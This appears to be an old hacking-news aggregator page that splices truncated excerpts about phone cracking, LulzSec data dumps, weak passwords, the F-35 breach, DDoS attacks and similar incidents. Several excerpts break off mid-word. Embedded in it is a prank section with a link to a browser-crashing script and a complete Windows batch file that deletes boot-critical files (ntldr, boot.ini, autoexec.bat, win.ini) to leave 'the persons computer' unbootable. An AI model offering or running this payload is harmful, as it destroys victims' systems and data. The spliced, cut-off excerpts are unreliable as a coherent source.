White Hackers

That four-digit passcode you have installed on your iPhone might slow snoops down, but it won't stop them. Forbes  is reporting that in some cases, it takes less than two minutes to crack the code. Micro Systemation is a Swedish company that sells software capable of skirting privacy controls on iOS and Android gadgets. Law enforcement and military agencies use this software in order to access data on devices used by criminal suspects. In a video (see below) Micro Systemation is able to hack an iPhone in just seconds. Granted, the password wasn't very complicated – it was "0000." Forbes explains that the hack is possible through a Micro Systemation application called XRY, which deciphers the phone's password, siphons its data to a computer, and decrypts it in order to gain data like GPS logs, call history, contacts, text messages, keystrokes, and so forth. XRY works a lot like a jailbreak, Forbes said. The Micro Systemation team doesn't look for backd

LulzSec, the Anonymous offshoot that hacks for fun ("for the lulz"), disbanded last June after 50 days of high profile hacks, also known as the 50 Day Cruise. But the jokers appear to be making a comeback, perhaps in order to restore the confidence of its followers after it was revealed that former ringleader Sabu helped the FBI locate and arrest former teammates.  On Tuesday, hackers calling themselves "LulzSec Reborn" posted onto Pastebin the email database, including names and addresses, of every employee at San Jose-based IT firm, CSS Corp.  Preceding this, on Sunday the group hacked into military dating website, militarysingles.com. It dumped the names, emails, and passwords of around 170,000 members, many with .gov and .mil addresses. The hackers also defaced a page with its signature Nyan Cat after the site's parent company told  Data Breaches  there was "no actual evidence" of a breach.  The motivations behind these two targ

As the digital world becomes more and more complex, the need for deliberate, thorough security grows. Yes, we know, you’ve got everything “password protected.” And yes, not every hacker is like the guys in the movies who are able to keyboard their way through complicated layers of encrypted, password-protected security faster than a gamer boots up a new version of Call of Duty. Below is a list of the 10 most-favored passwords. If yours is there you A) ought to think about changing it, or B) post your Social  Security , credit card, and bank account numbers, and any other private information you think might be useful on your Facebook page. Password1 letmein Secure1 Abc123 123456 monkey Facebook1 passworD link2012 (your first name) Oh, and though it’s from an older, non-digital source, it would be well to remember the words of Confucius when setting your passwords: “When in a state of security, do not forget the possibility of ruin.”

Chinese hackers apparently gained access to information about vulnerabilities in Microsoft’s operating systems before a company patch was released, and security researchers are worried the leak came directly from Microsoft’s secured website. The Microsoft Security Response Center states the  Microsoft Active Protections Program  is a program for security software providers that “gives members a head start to reproduce the vulnerabilities and program [anti-hacking] tools in advance of Microsoft’s official security updates.” The site states, “The amount of time between the release of a Microsoft security update and the release of exploit code (vulnerability) for that update continues to shorten. MAPP gives security software providers early access to vulnerability information.” On March 13, Microsoft issued critical security update  MS12-020  for its Windows operating systems.

A GSM mobile phone user in India is not very safe from hacking attacks, a security company has demonstrated. Four founding members of a company called Matrix Shell say they have worked out a way to hack into India GSM phone numbers and make calls from them. They were able to use the unique SIM card number called International Mobile Subscriber Identity (IMSI) of their target victims. Using a firmware called Osmocom and using software written by them on it, they successfully hacked into GSM phones at a recent security conference. More Details

1.  Crash a Computer System With Nothing But a URL! I stumbled across this URL while surfing the internet. This is a javascript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM. WARNING: CLICKING ON THE LINK BELLOW MAY CAUSE A CRASH! USE AT YOUR OWN RISK! http://tiny.cc/ibJUN 2.  Shut Down a Computer Forever Open notepad and copy/paste this code: @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini Now Save it as a  .bat  file. This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. REMEMBER - DO NOT CLICK THIS FILE.   YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPE

# 1 --  Physical Access to the Phone  -- Obviously, if a person can get physical access to a cell phone, even for a few seconds, it's game over. The person can clone it, place a remote spying tool on the phone or download the pictures and information directly to their own account. #2 --  Hacking Email, Twitter and Apps  -- Most celebrities are hacked through email, Twitter and other accounts that they use on their phones. This is what happened to Scarlett Johanson, Kreayshawn, Mila Kunis and Christina Aguillera, among others -- and it may also be the reason for the more recent hacks on Heather Morris and Christina Hendricks. #3 --  Social Engineer the Phone Company  -- In 2005, hackers stole nude pictures of Paris Hilton by getting access to her T-Mobile Sidekick II, a precursor to today's smartphones. How did they do it? They  impersonated  a T-Mobile support tech over the phone and tricked T-Mobile employees into giving them access to the carrier's intranet site that

The BBC’s director general stops short of accusing Tehran, but speaks of strong links between the denial of service attack and the country. The  BBC  has fallen victim to another cyber attack, with all eyes looking to Iran as the possible perpetrator. The global media company believes a distributed denial of service  (DDoS) attack was the reason for its outlets across Persia falling down on 1 March, leaving citizens unable to view BBC TV channels or listen to the radio broadcasts. Details

(AFP Photo / Joe Raedle) When Washington, DC decided to try out an Internet voting system to make casting absentee ballots as easy as clicking a mouse, they dared hackers to compromise the contest. It was a feat accomplished in less than two days. The District of Columbia hosted a public trial before going live with an e-voting program to see if their presumably impenetrable online ballot system could sustain a cyber attack. If you’re wondering why they never followed through, it is because the government is going to need a lot more time with this one. More Info: http://rt.com/usa/news/hack-voting-system-dc-593/  

This plane  will have taken  more than $385 billion to develop and will take $1 trillion to sustain. It is the most expensive weapons system in history. And yet for 18 months, the Chinese were just living on (at least) BAE’s networks taking what they wanted. How much of the considerable cost and rework on this program comes from the data on it China has stolen along the way?   More Info on: http://www.emptywheel.net/2012/03/14/bae-f-35-hack-confirmed/?utm_source=rss&utm_medium=rss&utm_campaign=bae-f-35-hack-confirmed  

Check out this new instructable  which shows you how to read sensor values from an Arduino with your Android device using a cheap bluetooth serial device you can order for under $10 on dealextreme or ebay. This example uses Python as the scripting language for the Android scripting layer (SL4A) but you can choose from other languages like Perl, Lua, JavaScript etc. see:  http://code.google.com/p/android-scripting/  

The following two hacking attacks are been reported in the news today. - Anonymous has hacked the Vatican for a second time. The website for the Catholic Church, vatican.va , is currently down. Unlike  the first hack , which appeared to be a typical Distributed Denial of Service (DDoS) attack, this one is more than just taking down the website. The main target of the new strike is Vatican Radio, and today’s attack is possible because of a backdoor Anonymous created for itself the first time around. - A group of hackers calling themselves The Consortium is claiming to have accessed user data of over 70,000 users of the pornography website Digital Playground, according to Adult Video News . In addition here is a funny take on the recent Ruby on Rails vulnerability  https://lwn.net/Articles/485325/ For a more serious assessment check out the following post from errata security  on the attack which describes the vulnerability as follows For those who don’t speak Russ